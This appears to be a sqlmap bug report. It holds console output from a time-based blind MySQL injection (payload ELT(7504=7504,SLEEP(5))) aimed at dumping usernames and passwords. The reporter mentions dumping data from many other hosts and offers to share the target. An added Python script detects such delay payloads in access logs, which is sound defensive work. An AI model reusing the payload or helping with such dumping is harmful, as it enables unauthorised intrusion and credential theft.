Description
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 9530 HTTP(s) requests:
Parameter: id (GET)
Type: AND/OR time-based blind
Title: MySQL time-based blind - Parameter replace (ELT)
Payload: form_action=ask&page=1&id=ELT(7504=7504,SLEEP(5))
[15:30:03] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[15:30:03] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 5.0 (lenny)
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL Unknown
[15:30:03] [INFO] fetching entries of column(s) 'password, username' for table 'users' in database 'ast'
[15:30:03] [INFO] fetching number of column(s) 'password, username' entries for table 'users' in database 'ast'
[15:30:03] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[15:30:11] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[15:30:12] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[15:30:12] [WARNING] unable to retrieve the number of column(s) 'password, username' entries for table 'users' in database 'ast'
[15:30:12] [INFO] fetched data logged to text files under 'C:\Users\x.sqlmap\output\סס'
[*] shutting down at 15:30:12
This script I already have a bug on,
Notice: the requested page has a redirect to login when requested directly.
I dumped data from other hosts with the same injection point, but over many other hosts with the same version it gives what is shown above,
I used tampers and had the same issue.
Any suggestions? I can send the target to check.
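From the defender's side, the run above leaves a clear trace: thousands of requests to one parameter whose value carries a MySQL delay primitive (the reported payload is `id=ELT(7504=7504,SLEEP(5))`), and, as the reporter notes, the application answers with a redirect to login, so the probe is visible in the access log even when the page itself is not served. The following is an added example, not code from sqlmap or from this issue: it parses constructed Apache-style access log lines (documentation-range IPs, invented timestamps) and flags query parameters carrying `SLEEP()`/`BENCHMARK()` so a single source hammering one parameter stands out.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access log lines (not taken from the issue). The payload shape
# mirrors the one sqlmap reported: id=ELT(7504=7504,SLEEP(5)); the 302 matches
# the reporter's note that the page redirects to login when requested directly.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:15:29:58 +0000] "GET /index.php?form_action=ask&page=1&id=ELT(7504%3D7504,SLEEP(5)) HTTP/1.1" 302 0
203.0.113.5 - - [10/Oct/2023:15:29:59 +0000] "GET /index.php?form_action=ask&page=1&id=ELT(7504%3D7504,SLEEP(5)) HTTP/1.1" 302 0
203.0.113.5 - - [10/Oct/2023:15:30:04 +0000] "GET /index.php?form_action=ask&page=1&id=1%20AND%20SLEEP(5) HTTP/1.1" 302 0
198.51.100.9 - - [10/Oct/2023:15:30:05 +0000] "GET /index.php?form_action=ask&page=1&id=42 HTTP/1.1" 200 5120
"""

# Common Log Format: client, identd, user, [timestamp], "METHOD PATH PROTO", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# MySQL time-delay primitives that a time-based blind probe relies on.
TIME_PAYLOAD_RE = re.compile(r'\b(SLEEP|BENCHMARK)\s*\(', re.IGNORECASE)


def find_time_based_probes(log_text):
    """Return (ip, parameter, decoded value, status) for every request whose
    query string carries a time-delay primitive in any parameter value."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in Common Log Format
        query = urlsplit(m.group("path")).query
        # parse_qsl percent-decodes values, so %3D and %20 become '=' and ' '
        for name, value in parse_qsl(query, keep_blank_values=True):
            if TIME_PAYLOAD_RE.search(value):
                hits.append((m.group("ip"), name, value, int(m.group("status"))))
    return hits


def summarize(hits):
    """Count probes per (client IP, parameter); a time-based blind run produces
    thousands of such requests against one parameter from one source."""
    counts = {}
    for ip, param, _value, _status in hits:
        counts[(ip, param)] = counts.get((ip, param), 0) + 1
    return counts


if __name__ == "__main__":
    for key, n in summarize(find_time_based_probes(SAMPLE_LOG)).items():
        print(f"{key[0]} probed parameter '{key[1]}' with delay payloads {n} times")
```

On real logs, read the access log file instead of `SAMPLE_LOG` and alert when the per-(IP, parameter) count crosses a threshold over a short window; responses that are all redirects (302) with zero bytes are a sign the probes are hitting an auth gate rather than the page itself.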